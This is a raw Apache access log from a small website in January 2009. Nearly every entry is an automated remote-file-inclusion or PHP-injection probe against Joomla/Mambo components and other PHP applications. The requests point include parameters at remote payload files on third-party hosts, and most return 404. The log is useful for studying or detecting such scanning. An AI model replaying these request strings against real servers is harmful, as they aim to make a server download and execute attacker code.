77.222.40.154 - - [05/Jan/2009:21:45:06 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:45:07 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:46:23 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:48:42 -0800] "GET /logs/access_081220.log/akocomments.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:48:42 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:48:42 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:49:00 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:49:00 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:49:29 -0800] "GET /logs/access_081220.log//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:49:29 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:49:29 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:50:02 -0800] "GET /logs/access_081207.log/akocomments.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:50:19 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:50:19 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
77.222.40.154 - - [05/Jan/2009:21:50:20 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
216.180.251.146 - - [05/Jan/2009:21:51:57 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
216.180.251.146 - - [05/Jan/2009:21:51:57 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
216.180.251.146 - - [05/Jan/2009:21:51:57 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
216.180.251.146 - - [05/Jan/2009:21:51:57 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:21:52:04 -0800] "GET /logs/access_081226.log/akocomments.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
69.94.45.22 - - [05/Jan/2009:21:53:23 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
69.94.45.22 - - [05/Jan/2009:21:53:23 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
69.94.45.22 - - [05/Jan/2009:21:53:23 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:21:53:29 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:21:53:29 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:21:53:29 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:21:54:05 -0800] "GET /logs/modernbill/include/scripts/export_batch.inc.php?DIR=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:21:54:05 -0800] "GET /modernbill/include/scripts/export_batch.inc.php?DIR=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:21:54:44 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:21:54:44 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.spongyfeet.com"
74.6.17.190 - - [05/Jan/2009:21:55:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "spongyfeet.com"
65.39.182.49 - - [05/Jan/2009:21:55:30 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:55:33 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:55:33 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:55:34 -0800] "GET /logs/access_081225.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
69.94.45.22 - - [05/Jan/2009:21:55:39 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:21:55:51 -0800] "GET /logs/access_081222.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:19 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:19 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:19 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:46 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:46 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:56:46 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:21:56:48 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:21:56:48 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:21:57:22 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:21:57:22 -0800] "GET /logs/access.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:21:57:40 -0800] "GET /logs/access_081220.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:21:57:40 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:21:57:40 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
216.17.106.121 - - [05/Jan/2009:21:57:44 -0800] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:58:04 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:21:58:30 -0800] "GET /logs/access_081207.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
213.186.117.208 - - [05/Jan/2009:21:58:34 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
213.186.117.208 - - [05/Jan/2009:21:58:34 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.knoxcommunitychurch.com/calander/install/r0bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:21:58:42 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
208.111.154.16 - - [05/Jan/2009:21:58:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "spongyfeet.com"
208.111.154.16 - - [05/Jan/2009:21:58:55 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:21:59:01 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:21:59:01 -0800] "GET /logs/access_081220.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:21:59:01 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:59:05 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
213.226.166.122 - - [05/Jan/2009:21:59:06 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:21:59:38 -0800] "GET /logs/access_081207.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
125.244.178.67 - - [05/Jan/2009:22:01:24 -0800] "GET /logs/access_081220.log/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:22:01:27 -0800] "GET /logs/access_081220.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.204.123.84 - - [05/Jan/2009:22:01:29 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
85.214.79.241 - - [05/Jan/2009:22:01:33 -0800] "GET /logs/access_081207.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://demod.net/test/data/abcd/iblissnet/tux/gore/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
200.204.123.84 - - [05/Jan/2009:22:01:34 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
200.204.123.84 - - [05/Jan/2009:22:01:34 -0800] "GET /logs/access_081220.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:01:39 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
125.244.178.67 - - [05/Jan/2009:22:01:45 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.gogalev.ru//netcat/modules/info.txt??? HTTP/1.1" 200 2803 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:06 -0800] "GET /logs//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:06 -0800] "GET /logs/access_081207.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:22:02:09 -0800] "GET /logs/access_081220.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:14 -0800] "GET /logs/access_081207.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:14 -0800] "GET /logs//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:19 -0800] "GET /logs/access_081220.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:20 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:21 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:21 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:22 -0800] "GET /logs/access_081226.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:22 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:02:23 -0800] "GET /logs/access_081220.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
132.247.8.18 - - [05/Jan/2009:22:02:23 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://start4all.biz//flatcalendar/oye.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:02:32 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:02:59 -0800] "GET /logs/access_081218.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:02:59 -0800] "GET /logs//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:03:11 -0800] "GET /logs/access_081225.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:03:20 -0800] "GET /logs/access_081218.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:03:20 -0800] "GET /logs//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
89.111.180.85 - - [05/Jan/2009:22:03:34 -0800] "GET /logs/access_081225.log%20%20//////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.hunacca.hu/gr/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:03:53 -0800] "GET /logs/access_081225.log/akocomments.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:06:39 -0800] "GET /logs/modernbill/include/scripts/export_batch.inc.php?DIR=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:06:39 -0800] "GET /modernbill/include/scripts/export_batch.inc.php?DIR=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
69.94.45.22 - - [05/Jan/2009:22:06:47 -0800] "GET /logs/access_081226.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.spongyfeet.com"
12.53.219.68 - - [05/Jan/2009:22:08:10 -0800] "GET /logs/access_081225.log//assets/snippets/reflect/snippet.reflect.php?base_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
12.53.219.68 - - [05/Jan/2009:22:08:10 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?base_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
12.53.219.68 - - [05/Jan/2009:22:08:12 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?base_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
12.53.219.68 - - [05/Jan/2009:22:08:45 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?base_path=http://www.jiaoshi.com.cn/status/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
